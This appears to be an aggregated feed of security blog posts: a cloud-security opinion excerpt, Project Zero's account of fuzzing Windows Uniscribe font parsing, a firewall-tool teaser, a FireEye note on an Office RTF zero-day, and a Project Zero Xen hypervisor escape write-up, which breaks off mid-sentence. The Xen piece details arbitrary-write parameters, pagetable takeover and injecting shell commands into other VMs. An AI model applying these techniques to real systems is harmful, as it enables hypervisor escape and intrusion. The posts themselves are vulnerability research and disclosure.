Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.) Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

Notes on Windows Uniscribe Fuzzing

Posted by Mateusz Jurczyk of Google Project Zero

Among the total of 119 vulnerabilities with CVEs fixed by Microsoft in the March Patch Tuesday a few weeks ago, there were 29 bugs reported by us in the font-handling code of the Uniscribe library. Admittedly the subject of font-related security has already been extensively discussed on this blog both in the context of manual analysis [1][2] and fuzzing [3][4]. However, what makes this effort a bit different from the previous ones is the fact that Uniscribe is a little-known user-mode component, which had not been widely recognized as a viable attack vector before, as opposed to the kernel-mode font implementations included in the win32k.sys and ATMFD.DLL drivers. In this post, we outline a brief history and description of Uniscribe, explain how we approached at-scale fuzzing of the library, and highlight some of the more interesting discoveries we have made so far. All the raw reports of the bugs we’re referring to (as they were submitted to Microsoft), together with the corresponding proof-of-concept samples, can be found in the official Project Zero bug tracker [5]. Enjoy!

Introduction

It was November 2016 when we started yet another iteration of our Windows font fuzzing job (whose architecture was thoroughly described in [4]). At that point, the kernel attack surface was mostly fuzz-clean with regards to the techniques we were using, but we still like to play with the configuration and input corpus from time to time to see if we can squeeze out any more bugs with the existing infrastructure. What we ended up with a several days later were a bunch of samples which supposedly crashed the guest Windows system running inside of Bochs. When we fed them to our reproduction pipeline, none of the bugchecks occurred again for unclear reasons. As disappointing as that was, there also was one interesting and unexpected result: for one of the test cases, the user-mode harness crashed itself, without bringing the whole OS down at the same time. This could indicate either that there was a bug in our code, or that there was some unanticipated font parsing going on in ring-3. When we started digging deeper, we found out that the unhandled exception took place in the following context:

(4464.11b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0933d8bf ebx=00000000 ecx=09340ffc edx=00001b9f esi=0026ecac edi=00000009
eip=752378f3 esp=0026ec24 ebp=0026ec2c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
USP10!ScriptPositionSingleGlyph+0x28533:
752378f3 668b4c5002      mov     cx,word ptr [eax+edx*2+2] ds:002b:09340fff=????

Until that moment, we didn’t fully realize that our tools were triggering any font-handling code beyond the well-known kernel implementation (despite some related bugs having been publicly fixed in the past, e.g. CVE-2016-7274 [6]). As a result, the fuzzing system was not prepared to catch user-mode faults, and thus any such crashes had remained completely undetected in favor of system bugchecks, which caused full machine restarts.

We quickly determined that the usp10.dll library corresponded to “Uniscribe Unicode script processor” (in Microsoft’s own words) [7]. It is a relatively large module (600-800 kB depending on system version and bitness) responsible for rendering Unicode-encoded text, as the name suggests. From a security perspective, it’s important that the code base dates back to Windows 2000, and includes a C++ implementation of the parsing of various complex TrueType/OpenType structures, in addition to what is already implemented in the kernel. The specific tables that Uniscribe touches on are primarily Advanced Typography Tables (“GDEF”, “GSUB”, “GPOS”, “BASE”, “JSTF”), but also “OS/2”, “cmap” and “maxp” to some extent. What’s equally significant is that the code can be reached simply by calling the DrawText [8] or other equivalent API with Unicode-encoded text and an attacker-controlled font. Since no special calls other than the typical ones are necessary to execute the most exposed areas of the library, it makes for a great attack vector in applications which use GDI to render text with fonts originating from untrusted sources. This is also evidenced by the stack trace of the original crash, and the fact that it occurred in a program which didn’t include any usp10-specific code:

0:000> kb
ChildEBP RetAddr
0026ec2c 09340ffc USP10!otlChainRuleSetTable::rule+0x13
0026eccc 0133d7d2 USP10!otlChainingLookup::apply+0x7d3
0026ed48 0026f09c USP10!ApplyLookup+0x261
0026ef4c 0026f078 USP10!ApplyFeatures+0x481
0026ef98 09342f40 USP10!SubstituteOtlGlyphs+0x1bf
0026efd4 0026f0b4 USP10!SubstituteOtlChars+0x220
0026f250 0026f370 USP10!HebrewEngineGetGlyphs+0x690
0026f310 0026f370 USP10!ShapingGetGlyphs+0x36a
0026f3fc 09316318 USP10!ShlShape+0x2ef
0026f440 09316318 USP10!ScriptShape+0x15f
0026f4a0 0026f520 USP10!RenderItemNoFallback+0xfa
0026f4cc 0026f520 USP10!RenderItemWithFallback+0x104
0026f4f0 09316124 USP10!RenderItem+0x22
0026f534 2d011da2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0026f54c 0000000a USP10!ScriptStringAnalyse+0x284
0026f598 0000000a LPK!LpkStringAnalyse+0xe5
0026f694 00000000 LPK!LpkCharsetDraw+0x332
0026f6c8 00000000 LPK!LpkDrawTextEx+0x40
0026f708 00000000 USER32!DT_DrawStr+0x13c
0026f754 0026fa30 USER32!DT_GetLineBreak+0x78
0026f800 0000000a USER32!DrawTextExWorker+0x255
0026f824 ffffffff USER32!DrawTextExW+0x1e

As can be seen here, the Uniscribe functionality was invoked internally by user32.dll through the lpk.dll (Language Pack) library. As soon as we learned about this new attack vector, we jumped at the first chance to fuzz it. Most of the infrastructure was already in place, since both user- and kernel-mode font fuzzing share a large number of the pieces. The extra work that we had to do was mostly related to filtering the input corpus, fiddling with the mutator configuration, adjusting the system configuration and implementing logic for the detection of user-mode crashes (both in the test harness and Bochs instrumentation). All of these steps are discussed in detail below. After a few days, we had everything working as planned, and after another couple, there were already over 80 crashes at unique addresses waiting for triage. Below is a summary of the issues that were found in the first fuzzing run and reported to Microsoft in December 2016.

Results at a glance

Since ~80 was still a fairly manageable number of crashes to triage manually, we tried to reproduce each of them by hand, deduplicating them and writing down their details at the same time. When we finished, we ended up with 8 separate high-severity issues that could potentially allow remote code execution:

Tracker ID
Memory access type at crash
Crashing function
CVE
Invalid write of n bytes (memcpy)
usp10!otlList::insertAt
CVE-2017-0108
Invalid read / write of 2 bytes
usp10!AssignGlyphTypes
CVE-2017-0084
Invalid write of n bytes (memset)
usp10!otlCacheManager::GlyphsSubstituted
CVE-2017-0086
Invalid write of n bytes (memcpy)
usp10!MergeLigRecords
CVE-2017-0087
Invalid write of 2 bytes
usp10!ttoGetTableData
CVE-2017-0088
Invalid write of 2 bytes
usp10!UpdateGlyphFlags
CVE-2017-0089
Invalid write of n bytes
usp10!BuildFSM and nearby functions
CVE-2017-0090
Invalid write of n bytes
usp10!FillAlternatesList
CVE-2017-0072

All of the bugs but one were triggered through a standard DrawText call and resulted in heap memory corruption. The one exception was the #1030 issue, which resided in a documented Uniscribe-specific ScriptGetFontAlternateGlyphs API function. The routine is responsible for retrieving a list of alternate glyphs for a specified character, and the interesting fact about the bug is that it wasn’t a problem with operating on any internal structures. Instead, the function failed to honor the value of the cMaxAlternates argument, and could therefore write more output data to the pAlternateGlyphs buffer than was allowed by the function caller. This meant that the buffer overflow was not specific to any particular memory type – depending on what pointer the client passed in, the overflow would take place on the stack, heap or static memory. The exploitability of such a bug would greatly depend on the program design and compilation options used to build it. We must admit, however, that it is unclear what the real-world clients of the function are, and whether any of them would meet the requirements to become a viable attack target.

Furthermore, we extracted 27 unique crashes caused by invalid memory reads from non-NULL addresses, which could potentially lead to information disclosure of secrets stored in the process address space. Due to the large volume of these crashes, we were unable to analyze each of them in much detail or perform any advanced deduplication. Instead, we partitioned them by the top-level exception address, and filed all of them as a single entry #1031 in the bug tracker:

  1. usp10!otlMultiSubstLookup::apply+0xa8
  2. usp10!otlSingleSubstLookup::applyToSingleGlyph+0x98
  3. usp10!otlSingleSubstLookup::apply+0xa9
  4. usp10!otlMultiSubstLookup::getCoverageTable+0x2c
  5. usp10!otlMark2Array::mark2Anchor+0x18
  6. usp10!GetSubstGlyph+0x2e
  7. usp10!BuildTableCache+0x1ca
  8. usp10!otlMkMkPosLookup::apply+0x1b4
  9. usp10!otlLookupTable::markFilteringSet+0x1a
  10. usp10!otlSinglePosLookup::getCoverageTable+0x12
  11. usp10!BuildTableCache+0x1e7
  12. usp10!otlChainingLookup::getCoverageTable+0x15
  13. usp10!otlReverseChainingLookup::getCoverageTable+0x15
  14. usp10!otlLigCaretListTable::coverage+0x7
  15. usp10!otlMultiSubstLookup::apply+0x99
  16. usp10!otlTableCacheData::FindLookupList+0x9
  17. usp10!ttoGetTableData+0x4b4
  18. usp10!GetSubtableCoverage+0x1ab
  19. usp10!otlChainingLookup::apply+0x2d
  20. usp10!MergeLigRecords+0x132
  21. usp10!otlLookupTable::subTable+0x23
  22. usp10!GetMaxParameter+0x53
  23. usp10!ApplyLookup+0xc3
  24. usp10!ApplyLookupToSingleGlyph+0x6f
  25. usp10!ttoGetTableData+0x19f6
  26. usp10!otlExtensionLookup::extensionSubTable+0x1d
  27. usp10!ttoGetTableData+0x1a77

In the end, it turned out that these 27 crashes manifested 21 actual bugs, which were fixed by Microsoft as CVE-2017-0083, CVE-2017-0091, CVE-2017-0092 and CVE-2017-0111 to CVE-2017-0128 in the MS17-011 security bulletin.

Lastly, we also reported 7 unique NULL pointer dereference issues with no deadline, with the hope that having any of them fixed would potentially enable our fuzzer to discover other, more severe bugs. On March 17th, MSRC responded that they investigated the cases and concluded that they were low-severity DoS problems only, and would not be fixed as part of a security bulletin in the near future.

Input corpus, mutation configuration and adjusting the test harness

Gathering a solid corpus of input samples is arguably one of the most important parts of fuzzing preparation, especially if code coverage feedback is not involved, making it impossible for the corpus to gradually evolve into a more optimal form. We were lucky enough to already have had several font corpora at our disposal from previous fuzzing runs. We decided to use the same set of files that had helped us discover 18 Windows kernel bugs in the past (see the “Preparing the input corpus” section of [4]). It was originally generated by running a corpus distillation algorithm over a large number of fonts crawled off the web, using an instrumented build of the FreeType2 open-source library, and consisted of 14848 TrueType and 4659 OpenType files, for a total of 2.4G of disk space. In order to tailor the corpus better for Uniscribe, we reduced it to just the files that contained at least one of the “GDEF”, “GSUB”, “GPOS”, “BASE” or “JSTF” tables, which are parsed by the library. This left us with 3768 TrueType and 2520 OpenType fonts consuming 1.68G on disk, which were much more likely to expose bugs in Uniscribe than any of the removed ones. That was the final corpus that we worked with.

The mutator configuration was also pretty similar to what we did for the kernel: we used the same five standard bitflipping, byteflipping, chunkspew, special ints and binary arithmetic algorithms with the precalculated per-table mutation ratio ranges. The only change made specifically for Uniscribe was to add mutations for the “BASE” and “JSTF” tables, which were previously not accounted for.

Last but not least, we extended the functionality of the guest fuzzing harness, responsible for invoking the tested font-related API (mostly displaying all of the font’s glyphs at various point sizes, but also querying a number of properties etc.). While it was clear that some of the relevant code was executed automatically through user32!DrawText with no modifications required, we wanted to maximize the coverage of Uniscribe code as much possible. A full reference of all its externally available functions can be found on MSDN [9]. After skimming through the documentation, we added calls to ScriptCacheGetHeight, ScriptGetFontProperties, ScriptGetCMap, ScriptGetFontAlternateGlyphs, ScriptSubstituteSingleGlyph and ScriptFreeCache. This quickly proved to be a successful idea, as it allowed us to discover the aforementioned generic bug in ScriptGetFontAlternateGlyphs. Furthermore, we decided to remove invocations of the GetKerningPairs and GetGlyphOutline API functions, as their corresponding logic was located in the kernel, while our focus had now shifted strictly to user-mode. As such, they wouldn’t lead to the discovery of any new bugs in Uniscribe, but would instead slow the overall fuzzing process down. Apart from these minor modifications, the core of the test harness remained unchanged.

By taking the measures listed above, we hoped that they were sufficient to trigger most of the low hanging fruit bugs. With this assumption, the only part left was to make sure that the crashes would be reliably caught and reported to the fuzzer. This subject is discussed in the next section.

Crash detection

The first step we took to detect Uniscribe crashes effectively was disabling Special Pools for win32k.sys and ATMFD.DLL (which caused unnecessary overhead for no gain in user-mode), while enabling the PageHeap option in Application Verifier for the harness process. This was done to improve our chances at detecting invalid memory accesses, and make reproduction and deduplication more reliable.

Thanks to the fact that the fuzz-tested code in usp10.dll executed in the same context as the rest of the harness logic, we didn’t have to write a full-fledged Windows debugger to supervise another process. Instead, we just set up a top-level exception handler with the SetUnhandledExceptionFilter function, which then got called every time a fatal exception was generated in the process. The handler’s job was to send out the state of the crashing CPU context (passed in through ExceptionInfo->ContextRecord) to the hypervisor (i.e. the Bochs instrumentation) through the “debug print” hypercall, and then actually report that the crash occurred at the specific address.

In the kernel font fuzzing scenario, crashes were detected by the Bochs instrumentation with the BX_INSTR_RESET instrumentation callback. This approach worked because the guest system was configured to automatically reboot on bugcheck, consequently triggering the bx_instr_reset handler. The easiest way to integrate this approach with user-mode fuzzing would be therefore to just add a ExitWindowsEx call in the epilogue of the exception handler, making everything work out of the box without even touching the existing Bochs instrumentation. However, the method would result in losing information about the crash location, making automated deduplication impossible. In order to address this problem, we introduced a new “crash encountered” hypercall, which received the address of the faulting instruction in the argument from the guest, and passed this information further down our scalable fuzzing infrastructure. Having the crashes grouped by the exception address right from the start saved us a ton of postprocessing time, and limited the number of test cases we had to look at to a bare minimum.

This is the end of a list of differences between the Windows kernel font fuzzing setup we’ve been using for nearly two years now, and an equivalent setup for user-mode fuzzing that we only built a few months ago, but has already proven very effective. Everything else has remained the same as described in the “font fuzzing techniques” article from last year [4].

Conclusions

It is a fascinating but dire realization that even for such a well known class of bug hunting targets as font parsing implementations, it is still possible to discover new attack vectors dating back to the previous century, having remained largely unaudited until now, and being as exposed as the interfaces we already know about. We believe that this is a great example of how gradually rising the bar for a variety of software can have much more impact than trying to kill every last bug in a narrow range of code. It is also illustrative of the fact that the time spent on thoroughly analyzing the attack surface and looking for little-known targets may turn out very fruitful, as the security community still doesn’t have a full understanding of the attack vectors in every important data processing stack (such as the Windows font handling in this case).

This effort and its results show that fuzzing is a very universal technique, and most of its components can be easily reused from one target to another, especially within the scope of a single file format. Finally, it has proven that it is possible to fuzz not just the Windows kernel, but also regular user-mode code, regardless of the environment of the host system (which was Linux in our case). While the Bochs x86 emulator incurs a significant overhead as compared to native execution speed, it can often be scaled against to still achieve a net gain in the number of iterations per second. As an interesting fact, issues #993 (Windows kernel registry hive loading), #1042 (EMF+ processing in GDI+), #1052 and #1054 (color profile processing) fixed in the last Patch Tuesday were also found with fuzzing Windows on Bochs, but with slightly different input samples, test harnesses and mutation strategies. :)

References

  1. The “One font vulnerability to rule them all” series starting with https://googleprojectzero.blogspot.com/2015/07/one-font-vulnerability-to-rule-them-all.html
  2. https://msdn.microsoft.com/pl-pl/library/windows/desktop/dd374093(v=vs.85).aspx

Fight firewall sprawl with AlgoSec, Tufin, Skybox suites

New and innovative security tools seem to be emerging all the time, but the frontline defense for just about every network in operation today remains the trusty firewall. They aren’t perfect, but if configured correctly and working as intended, firewalls can do a solid job of blocking threats from entering a network, while restricting unauthorized traffic from leaving.

The problem network administrators face is that as their networks grow, so do the number of firewalls. Large enterprises can find themselves with hundreds or thousands, a mix of old, new and next-gen models, probably from multiple vendors -- sometimes accidentally working against each other. For admins trying to configure firewall rules, the task can quickly become unmanageable.

To read this article in full, please click here

(Insider Story)

Acknowledgement of Attacks Leveraging Microsoft Zero-Day

FireEye recently detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating for several weeks public disclosure timed with the release of a patch by Microsoft to address the vulnerability. After recent public disclosure by another company, this blog serves to acknowledge FireEye’s awareness and coverage of these attacks.

FireEye email and network solutions detect the malicious documents as: Malware.Binary.Rtf.

Attack Scenario

The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.

The vulnerability is bypassing most mitigations; however, as noted above, FireEye email and network products detect the malicious documents. Microsoft Office users are recommended to apply the patch as soon as it is available. 

Acknowledgements

FLARE Team, FireEye Labs Team, FireEye iSIGHT Intelligence, and Microsoft Security Response Center (MSRC).

Pandavirtualization: Exploiting the Xen hypervisor

Posted by Jann Horn, Project Zero

On 2017-03-14, I reported a bug to Xen's security team that permits an attacker with control over the kernel of a paravirtualized x86-64 Xen guest to break out of the hypervisor and gain full control over the machine's physical memory. The Xen Project publicly released an advisory and a patch for this issue 2017-04-04.

To demonstrate the impact of the issue, I created an exploit that, when executed in one 64-bit PV guest with root privileges, will execute a shell command as root in all other 64-bit PV guests (including dom0) on the same physical machine.

Background

access_ok()

On x86-64, Xen PV guests share the virtual address space with the hypervisor. The coarse memory layout looks as follows:


Xen allows the guest kernel to perform hypercalls, which are essentially normal system calls from the guest kernel to the hypervisor using the System V AMD64 ABI. They are performed using the syscall instruction, with up to six arguments passed in registers. Like normal syscalls, Xen hypercalls often take guest pointers as arguments. Because the hypervisor shares its address space, it makes sense for guests to simply pass in guest-virtual pointers.

Like any kernel, Xen has to ensure that guest-virtual pointers don't actually point to hypervisor-owned memory before dereferencing them. It does this using userspace accessors that are similar to those in the Linux kernel; for example:

  • access_ok(addr, size) for checking whether a guest-supplied virtual memory range is safe to access - in other words, it checks that accessing the memory range will not modify hypervisor memory
  • __copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd without checking whether hnd is safe
  • copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd if hnd is safe

In the Linux kernel, the macro access_ok() checks whether the whole memory range from addr to addr+size-1 is safe to access, using any memory access pattern. However, Xen's access_ok() doesn't guarantee that much:

/*
* Valid if in +ve half of 48-bit address space, or above Xen-reserved area.
* This is also valid for range checks (addr, addr+size). As long as the
* start address is outside the Xen-reserved area then we will access a
* non-canonical address (and thus fault) before ever reaching VIRT_START.
*/
#define __addr_ok(addr) \
   (((unsigned long)(addr) < (1UL<<47)) || \
    ((unsigned long)(addr) >= HYPERVISOR_VIRT_END))

#define access_ok(addr, size) \
   (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))

Xen normally only checks that addr points into the userspace area or the kernel area without checking size. If the actual guest memory access starts roughly at addr, proceeds linearly without skipping gigantic amounts of memory and bails out as soon as a guest memory access fails, only checking addr is sufficient because of the large range of non-canonical addresses, which serve as a large guard area. However, if a hypercall wants to access a guest buffer starting at a 64-bit offset, it needs to ensure that the access_ok() check is performed using the correct offset - checking the whole userspace buffer is unsafe!

Xen provides wrappers around access_ok() for accessing arrays in guest memory. If you want to check whether it's safe to access an array starting at element 0, you can use guest_handle_okay(hnd, nr). However, if you want to check whether it's safe to access an array starting at a different element, you need to use guest_handle_subrange_okay(hnd, first, last).

When I saw the definition of access_ok(), the lack of security guarantees actually provided by access_ok() seemed rather unintuitive to me, so I started searching for its callers, wondering whether anyone might be using it in an unsafe way.

Hypercall Preemption

When e.g. a scheduler tick happens, Xen needs to be able to quickly switch from the currently executing vCPU to another VM's vCPU. However, simply interrupting the execution of a hypercall won't work (e.g. because the hypercall could be holding a spinlock), so Xen (like other operating systems) needs some mechanism to delay the vCPU switch until it's safe to do so.

In Xen, hypercalls are preempted using voluntary preemption: Any long-running hypercall code is expected to regularly call hypercall_preempt_check() to check whether the scheduler wants to schedule to another vCPU. If this happens, the hypercall code exits to the guest, thereby signalling to the scheduler that it's safe to preempt the currently-running task, after adjusting the hypercall arguments (in guest registers or guest memory) so that as soon as the current vCPU is scheduled again, it will re-enter the hypercall and perform the remaining work. Hypercalls don't distinguish between normal hypercall entry and hypercall re-entry after preemption.

This hypercall re-entry mechanism is used in Xen because Xen does not have one hypervisor stack per vCPU; it only has one hypervisor stack per physical core. This means that while other operating systems (e.g. Linux) can simply leave the state of an interrupted syscall on the kernel stack, Xen can't do that as easily.

This design means that for some hypercalls, to allow them to properly resume their work, additional data is stored in guest memory that could potentially be manipulated by the guest to attack the hypervisor.

memory_exchange()

The hypercall HYPERVISOR_memory_op(XENMEM_exchange, arg) invokes the function memory_exchange(arg) in xen/common/memory.c. This function allows a guest to "trade in" a list of physical pages that are currently assigned to the guest in exchange for new physical pages with different restrictions on their physical contiguity. This is useful for guests that want to perform DMA because DMA requires physically contiguous buffers.

The hypercall takes a struct xen_memory_exchange as argument, which is defined as follows:

struct xen_memory_reservation {
   /* [...] */
   XEN_GUEST_HANDLE(xen_pfn_t) extent_start; /* in: physical page list */

   /* Number of extents, and size/alignment of each (2^extent_order pages). */
   xen_ulong_t    nr_extents;
   unsigned int   extent_order;

   /* XENMEMF flags. */
   unsigned int   mem_flags;

   /*
    * Domain whose reservation is being changed.
    * Unprivileged domains can specify only DOMID_SELF.
    */
   domid_t        domid;
};

struct xen_memory_exchange {
   /*
    * [IN] Details of memory extents to be exchanged (GMFN bases).
    * Note that @in.address_bits is ignored and unused.
    */
   struct xen_memory_reservation in;

   /*
    * [IN/OUT] Details of new memory extents.
    * We require that:
    *  1. @in.domid == @out.domid
    *  2. @in.nr_extents  << @in.extent_order ==
    *     @out.nr_extents << @out.extent_order
    *  3. @in.extent_start and @out.extent_start lists must not overlap
    *  4. @out.extent_start lists GPFN bases to be populated
    *  5. @out.extent_start is overwritten with allocated GMFN bases
    */
   struct xen_memory_reservation out;

   /*
    * [OUT] Number of input extents that were successfully exchanged:
    *  1. The first @nr_exchanged input extents were successfully
    *     deallocated.
    *  2. The corresponding first entries in the output extent list correctly
    *     indicate the GMFNs that were successfully exchanged.
    *  3. All other input and output extents are untouched.
    *  4. If not all input exents are exchanged then the return code of this
    *     command will be non-zero.
    *  5. THIS FIELD MUST BE INITIALISED TO ZERO BY THE CALLER!
    */
   xen_ulong_t nr_exchanged;
};

The fields that are relevant for the bug are in.extent_start, in.nr_extents, out.extent_start, out.nr_extents and nr_exchanged.

nr_exchanged is documented as always being initialized to zero by the guest - this is because it is not only used to return a result value, but also for hypercall preemption. When memory_exchange() is preempted, it stores its progress in nr_exchanged, and the next execution of memory_exchange() uses the value of nr_exchanged to decide at which point in the input arrays in.extent_start and out.extent_start it should resume.

Originally, memory_exchange() did not check the userspace array pointers at all before accessing them with __copy_from_guest_offset() and __copy_to_guest_offset(), which do not perform any checks themselves - so by supplying hypervisor pointers, it was possible to cause Xen to read from and write to hypervisor memory - a pretty severe bug. This was discovered in 2012 (XSA-29, CVE-2012-5513) and fixed as follows (https://xenbits.xen.org/xsa/xsa29-4.1.patch):

diff --git a/xen/common/memory.c b/xen/common/memory.c
index 4e7c234..59379d3 100644
--- a/xen/common/memory.c
+++ b/xen/common/memory.c
@@ -289,6 +289,13 @@ static long memory_exchange(XEN_GUEST_HANDLE(xen_memory_exchange_t) arg)
        goto fail_early;
    }
+    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
+         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
+    {
+        rc = -EFAULT;
+        goto fail_early;
+    }
+
    /* Only privileged guests can allocate multi-page contiguous extents. */
    if ( !multipage_allocation_permitted(current->domain,
                                         exch.in.extent_order) ||

The bug

As can be seen in the following code snippet, the 64-bit resumption offset nr_exchanged, which can be controlled by the guest because of Xen's hypercall resumption scheme, can be used by the guest to choose an offset from out.extent_start at which the hypervisor should write:

static long memory_exchange(XEN_GUEST_HANDLE_PARAM(xen_memory_exchange_t) arg)
{
   [...]

   /* Various sanity checks. */
   [...]

   if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
        !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
   {
       rc = -EFAULT;
       goto fail_early;
   }

   [...]

   for ( i = (exch.nr_exchanged >> in_chunk_order);
         i < (exch.in.nr_extents >> in_chunk_order);
         i++ )
   {
       [...]
       /* Assign each output page to the domain. */
       for ( j = 0; (page = page_list_remove_head(&out_chunk_list)); ++j )
       {
           [...]
           if ( !paging_mode_translate(d) )
           {
               [...]
               if ( __copy_to_guest_offset(exch.out.extent_start,
                                           (i << out_chunk_order) + j,
                                           &mfn, 1) )
                   rc = -EFAULT;
           }
       }
       [...]
   }
   [...]
}

However, the guest_handle_okay() check only checks whether it would be safe to access the guest array exch.out.extent_start starting at offset 0; guest_handle_subrange_okay() would have been correct. This means that an attacker can write an 8-byte value to an arbitrary address in hypervisor memory by choosing:

  • exch.in.extent_order and exch.out.extent_order as 0 (exchanging page-sized blocks of physical memory for new page-sized blocks)
  • exch.out.extent_start and exch.nr_exchanged so that exch.out.extent_start points to userspace memory while exch.out.extent_start+8*exch.nr_exchanged points to the target address in hypervisor memory, with exch.out.extent_start close to NULL; this can be calculated as exch.out.extent_start=target_addr%8, exch.nr_exchanged=target_addr/8.
  • exch.in.nr_extents and exch.out.nr_extents as exch.nr_exchanged+1
  • exch.in.extent_start as input_buffer-8*exch.nr_exchanged (where input_buffer is a legitimate guest kernel pointer to a physical page number that is currently owned by the guest). This is guaranteed to always point to the guest userspace range (and therefore pass the access_ok() check) because exch.out.extent_start roughly points to the start of the userspace address range and the hypervisor and guest kernel address ranges together are only as big as the userspace address range.

The value that is written to the attacker-controlled address is a physical page number (physical address divided by the page size).

Exploiting the bug: Gaining pagetable control

Especially on a busy system, controlling the page numbers that are written by the kernel might be difficult. Therefore, for reliable exploitation, it makes sense to treat the bug as a primitive that permits repeatedly writing 8-byte values at controlled addresses, with the most significant bits being zeroes (because of the limited amount of physical memory) and the least significant bits being more or less random. For my exploit, I decided to treat this primitive as one that writes an essentially random byte followed by seven bytes of garbage.

It turns out that for an x86-64 PV guest, such a primitive is sufficient for reliably exploiting the hypervisor for the following reasons:

  • x86-64 PV guests know the real physical page numbers of all pages they can access
  • x86-64 PV guests can map live pagetables (from all four paging levels) belonging to their domain as readonly; Xen only prevents mapping them as writable
  • Xen maps all physical memory as writable at 0xffff830000000000 (in other words, the hypervisor can write to any physical page, independent of the protections using which it is mapped in other places, by writing to physical_address+0xffff830000000000).

The goal of the attack is to point an entry in a live level 3 pagetable (which I'll call "victim pagetable") to a page to which the guest has write access (which I'll call "fake pagetable"). This means that the attacker has to write an 8-byte value, containing the physical page number of the fake pagetable and some flags, into an entry in the victim pagetable, and ensure that the following 8-byte pagetable entry stays disabled (e.g. by setting the first byte of the following entry to zero). Essentially, the attacker has to write 9 controlled bytes followed by 7 bytes that don't matter.

Because the physical page numbers of all relevant pages and the address of the writable mapping of all physical memory are known to the guest, figuring out where to write and what value to write is easy, so the only remaining problem is how to use the primitive to actually write data.

Because the attacker wants to use the primitive to write to a readable page, the "write one random byte followed by 7 bytes of garbage" primitive can easily be converted to a "write one controlled byte followed by 7 bytes of garbage" primitive by repeatedly writing a random byte and reading it back until the value is right. Then, the "write one controlled byte followed by 7 bytes of garbage" primitive can be converted to a "write controlled data followed by 7 bytes of garbage" primitive by writing bytes to consecutive addresses - and that's exactly the primitive needed for the attack.

At this point, the attacker can control a live pagetable, which allows the attacker to map arbitrary physical memory into the guest's virtual address space. This means that the attacker can reliably read from and write to the memory, both code and data, of the hypervisor and all other VMs on the system.

Running shell commands in other VMs

At this point, the attacker has full control over the machine, equivalent to the privilege level of the hypervisor, and can easily steal secrets by searching through physical memory; and a realistic attacker probably wouldn't want to inject code into VMs, considering how much more detectable that makes an attack.

But running an arbitrary shell command in other VMs makes the severity more obvious (and it looks cooler), so for fun, I decided to continue my exploit so that it injects a shell command into all other 64-bit PV domains.

As a first step, I wanted to reliably gain code execution in hypervisor context. Given the ability to read and write physical memory, one relatively OS- (or hypervisor-)independent way to call an arbitrary address with kernel/hypervisor privileges is to locate the Interrupt Descriptor Table using the unprivileged SIDT instruction, write an IDT entry with DPL 3 and raise the interrupt. (Intel's upcoming Cannon Lake CPUs are apparently going to support User-Mode Instruction Prevention (UMIP), which will finally make SIDT a privileged instruction.) Xen supports SMEP and SMAP, so it isn't possible to just point the IDT entry at guest memory, but using the ability to write pagetable entries, it is possible to map a guest-owned page with hypervisor-context shellcode as non-user-accessible, which allows it to run despite SMEP.

Then, in hypervisor context, it is possible to hook the syscall entry point by reading and writing the IA32_LSTAR MSR. The syscall entry point is used both for syscalls from guest userspace and for hypercalls from guest kernels. By mapping an attacker-controlled page into guest-user-accessible memory, changing the register state and invoking sysret, it is possible to divert the execution of guest userspace code to arbitrary guest user shellcode, independent of the hypervisor or the guest operating system.

My exploit injects shellcode into all guest userspace processes that is invoked on every write() syscall. Whenever the shellcode runs, it checks whether it is running with root privileges and whether a lockfile doesn't exist in the guest's filesystem yet. If these conditions are fulfilled, it uses the clone() syscall to create a child process that runs an arbitrary shell command.

(Note: My exploit doesn't clean up after itself on purpose, so when the attacking domain is shut down later, the hooked entry point will quickly cause the hypervisor to crash.)

Here is a screenshot of a successful attack against Qubes OS 3.2, which uses Xen as its hypervisor. The exploit is executed in the unprivileged domain "test124"; the screenshot shows that it injects code into dom0 and the firewallvm:



Conclusion

I believe that the root cause of this issue were the weak security guarantees made by access_ok(). The current version of access_ok() was committed in 2005, two years after the first public release of Xen and long before the first XSA was released. It seems like old code tends to contain relatively straightforward weaknesses more often than newer c